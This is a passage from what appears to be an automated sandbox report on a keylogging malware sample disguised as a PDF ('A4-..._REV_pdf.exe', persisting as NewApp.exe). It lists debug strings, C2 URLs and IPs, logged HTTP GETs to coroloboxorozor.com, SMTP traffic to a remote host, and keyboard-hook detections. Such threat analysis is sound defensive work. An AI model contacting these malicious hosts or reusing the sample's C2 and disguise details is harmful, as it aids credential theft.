                      Source: Binary string: ore.ni.pdb source: WerFault.exe, 0000000B.00000003.685836587.0000000005127000.00000004.00000001.sdmp
                      Source: Binary string: System.pdb source: WerFault.exe, 0000000B.00000002.705274793.0000000005420000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: NewApp.exe, 00000013.00000002.816014888.00000000009F0000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Roaming\NewApp\NewApp.PDBn^ source: NewApp.exe, 00000013.00000002.814816354.0000000000972000.00000004.00000020.sdmp
                      Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 0000000B.00000003.685766857.00000000052BB000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000B.00000003.685922840.00000000052A0000.00000004.00000040.sdmp
                      Source: Binary string: rtutils.pdbr source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: psapi.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: .pdb8h source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.696989572.0000000000CF7000.00000004.00000010.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000B.00000003.685808970.0000000005111000.00000004.00000001.sdmp
                      Source: Binary string: System.Core.pdbx source: WerFault.exe, 0000000B.00000002.705274793.0000000005420000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: cldapi.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdbr source: NewApp.exe, 00000013.00000002.814816354.0000000000972000.00000004.00000020.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000B.00000003.685695043.00000000052A2000.00000004.00000040.sdmp
                      Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000000B.00000003.685695043.00000000052A2000.00000004.00000040.sdmp
                      Source: Binary string: onfiguration.pdbrr source: WerFault.exe, 0000000B.00000003.685828894.00000000052BC000.00000004.00000001.sdmp
                      Source: Binary string: combase.pdbk source: WerFault.exe, 0000000B.00000003.685695043.00000000052A2000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.pdb source: WerFault.exe, 0000000B.00000003.685766857.00000000052BB000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbl.* source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697469091.000000000112F000.00000004.00000020.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 0000000B.00000002.705274793.0000000005420000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: A4-058000200390-10-14_REV_pdf.PDBZ source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.696989572.0000000000CF7000.00000004.00000010.sdmp
                      Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: bcryptprimitives.pdbk source: WerFault.exe, 0000000B.00000003.685695043.00000000052A2000.00000004.00000040.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: System.ni.pdb source: WerFault.exe, 0000000B.00000003.685836587.0000000005127000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: edputil.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: crypt32.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp

                      Networking:

                      barindex
                      C2 URLs / IPs found in malware configurationShow sources
                      Source: Malware configuration extractorURLs: http://2nUtGMgnxihCA8N2g.org
                      Source: global trafficTCP traffic: 192.168.2.4:49763 -> 103.17.211.69:587
                      Source: global trafficHTTP traffic detected: GET /base/BE0C9BE287721D2E1639C8881BC9F105.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /base/B7EFDEC15CD29E4CF1B708AC6486760D.html HTTP/1.1Host: coroloboxorozor.com
                      Source: global trafficHTTP traffic detected: GET /base/BE0C9BE287721D2E1639C8881BC9F105.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /base/B7EFDEC15CD29E4CF1B708AC6486760D.html HTTP/1.1Host: coroloboxorozor.com
                      Source: global trafficHTTP traffic detected: GET /base/BE0C9BE287721D2E1639C8881BC9F105.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /base/B7EFDEC15CD29E4CF1B708AC6486760D.html HTTP/1.1Host: coroloboxorozor.com
                      Source: Joe Sandbox ViewIP Address: 104.21.71.230 104.21.71.230
                      Source: Joe Sandbox ViewASN Name: IPSERVERONE-AS-APIPServerOneSolutionsSdnBhdMY IPSERVERONE-AS-APIPServerOneSolutionsSdnBhdMY
                      Source: global trafficTCP traffic: 192.168.2.4:49763 -> 103.17.211.69:587
                      Source: global trafficHTTP traffic detected: GET /base/BE0C9BE287721D2E1639C8881BC9F105.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /base/B7EFDEC15CD29E4CF1B708AC6486760D.html HTTP/1.1Host: coroloboxorozor.com
                      Source: global trafficHTTP traffic detected: GET /base/BE0C9BE287721D2E1639C8881BC9F105.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /base/B7EFDEC15CD29E4CF1B708AC6486760D.html HTTP/1.1Host: coroloboxorozor.com
                      Source: global trafficHTTP traffic detected: GET /base/BE0C9BE287721D2E1639C8881BC9F105.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /base/B7EFDEC15CD29E4CF1B708AC6486760D.html HTTP/1.1Host: coroloboxorozor.com
                      Source: unknownDNS traffic detected: queries for: coroloboxorozor.com
                      Source: NewApp.exe, 00000018.00000002.915676599.0000000002898000.00000004.00000001.sdmp, NewApp.exe, 00000018.00000002.916299146.0000000002A55000.00000004.00000001.sdmp, NewApp.exe, 00000018.00000002.916269984.0000000002A4C000.00000004.00000001.sdmp, NewApp.exe, 00000018.00000002.915858947.000000000298E000.00000004.00000001.sdmpString found in binary or memory: http://2nUtGMgnxihCA8N2g.org
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.920904751.00000000067E0000.00000004.00000001.sdmp, NewApp.exe, 00000018.00000002.916501179.0000000002A9A000.00000004.00000001.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697632475.0000000002C21000.00000004.00000001.sdmp, NewApp.exe, 00000012.00000002.817905457.0000000002F11000.00000004.00000001.sdmp, NewApp.exe, 00000013.00000002.818132626.0000000002601000.00000004.00000001.sdmpString found in binary or memory: http://coroloboxorozor.com
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697632475.0000000002C21000.00000004.00000001.sdmp, NewApp.exe, 00000012.00000002.817905457.0000000002F11000.00000004.00000001.sdmp, NewApp.exe, 00000013.00000002.818132626.0000000002601000.00000004.00000001.sdmpString found in binary or memory: http://coroloboxorozor.com/base/B7EFDEC15CD29E4CF1B708AC6486760D.html
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697632475.0000000002C21000.00000004.00000001.sdmp, NewApp.exe, 00000012.00000002.817905457.0000000002F11000.00000004.00000001.sdmp, NewApp.exe, 00000013.00000002.818132626.0000000002601000.00000004.00000001.sdmpString found in binary or memory: http://coroloboxorozor.com/base/BE0C9BE287721D2E1639C8881BC9F105.html
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.920904751.00000000067E0000.00000004.00000001.sdmp, NewApp.exe, 00000018.00000002.916501179.0000000002A9A000.00000004.00000001.sdmpString found in binary or memory: http://cps.letsencrypt.org0
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.920904751.00000000067E0000.00000004.00000001.sdmp, NewApp.exe, 00000018.00000002.916501179.0000000002A9A000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.920904751.00000000067E0000.00000004.00000001.sdmp, NewApp.exe, 00000018.00000002.916501179.0000000002A9A000.00000004.00000001.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.916340708.0000000002FFB000.00000004.00000001.sdmp, NewApp.exe, 00000018.00000002.916097296.0000000002A24000.00000004.00000001.sdmpString found in binary or memory: http://mail.soonlogistics.com
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.920904751.00000000067E0000.00000004.00000001.sdmp, NewApp.exe, 00000018.00000002.916501179.0000000002A9A000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/0
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.920904751.00000000067E0000.00000004.00000001.sdmp, NewApp.exe, 00000018.00000002.916501179.0000000002A9A000.00000004.00000001.sdmpString found in binary or memory: http://r3.o.lencr.org0
                      Source: WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
                      Source: WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
                      Source: WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
                      Source: WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
                      Source: WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
                      Source: WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
                      Source: WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697632475.0000000002C21000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, NewApp.exe, 00000012.00000002.817905457.0000000002F11000.00000004.00000001.sdmp, NewApp.exe, 00000013.00000002.818132626.0000000002601000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
                      Source: WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
                      Source: WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
                      Source: WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
                      Source: WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
                      Source: WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
                      Source: WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Contains functionality to register a low level keyboard hookShow sources
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_0643C37C SetWindowsHookExW 0000000D,00000000,?,?
                      Installs a global keyboard hookShow sources
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697398308.00000000010AB000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeWindow created: window name: CLIPBRDWNDCLASS
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeWindow created: window name: CLIPBRDWNDCLASS

                      System Summary:

                      barindex
                      Initial sample is a PE file and has a suspicious nameShow sources
                      Source: initial sampleStatic PE information: Filename: A4-058000200390-10-14_REV_pdf.exe
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 0_2_00E992E0 NtSetInformationThread,
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 0_2_00E9A031 NtSetInformationThread,
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 18_2_02DD92E0 NtSetInformationThread,
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 19_2_024192E0 NtSetInformationThread,
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 19_2_0241A031 NtSetInformationThread,
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 0_2_00E905A8
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 0_2_00E9C761
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 0_2_00E918F8
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 0_2_00E95B10
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 0_2_00E90C60
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 0_2_00E9BFE7
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 0_2_00E90598
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 0_2_00E95520
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 0_2_00E90C50
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_02D48210
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_02D40320
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_02D40040
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_02D42743
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_02D41F9C
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_02D48200
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_02D47389
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_02D430A0
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_02D4003B
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_02D477CD
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_02D47759
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_02D41F90
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_02D42FAF
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_02D41F3F
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_02D43D90
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_063A8268
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_063ADAE0
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_063A0098
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_063AF4E8
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_063A9EB8
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_063ADAA8
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_063AC681
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_063ADAD0
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_063ADB67
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_063AA7FE
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_063AC8CD
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_063ACCC2
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_063ACCC4
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_063ACD1A
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_063AA558
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_063AC5A8
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_063AC5A7
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_067B9738
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_067B8460
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_067B0040
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_067B90D0
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_067B5538
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_067B4D00
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_067B9AE7
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 18_2_02DDC618
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 18_2_02DD05A8
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 18_2_02DD5B10
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 18_2_02DD18F8
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 18_2_02DD2950
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 18_2_02DDBFF0
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 18_2_02DD0C60
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 18_2_02DD0598
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 18_2_02DD0C50
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 19_2_02410598
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 19_2_02415B10
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 19_2_024118F8
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 19_2_02412940
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 19_2_0241BFF0
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 19_2_02410C50
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 19_2_0241CD41
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 19_2_02415520
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_04D22742
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_04D20040
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_04D28210
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_04D20320
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_04D27398
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_04D21F9C
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_04D20007
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_04D28200
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_04D20311
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_04D277CD
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_04D27759
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_04D2309E
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_04D230A0
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_04D27389
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_04D23D90
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_04D21F90
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_05D3A558
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_05D3F4E8
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_05D30098
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_05D3DAE0
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_05D3C5A1
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_05D3C5A8
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_05D3A548
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_05D3CD1A
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_05D3F4D8
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_05D3CCC2
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_05D3CCC4
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_05D37488
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_05D3A7FE
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_05D3C681
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_05D39EB8
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_05D3C8CD
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_05D3DB67
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_05D3DAD5
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_063897AB
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_06388460
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_06380040
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_063890D0
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_06385538
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_06384D00
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_06389AE7
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_06387727
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_06384424
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_0638001F
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_06385816
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_06384CF0
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_063890CB
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_0638797E
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_06435687
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_064336B0
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_064345B8
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_064372C0
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_06438378
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_06436338
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_0643B050
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_06438078
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_06438E40
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_06433C18
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_06437DFE
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_06439A20
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_064335DA
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_064345AA
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_06434218
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_06434228
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_06438369
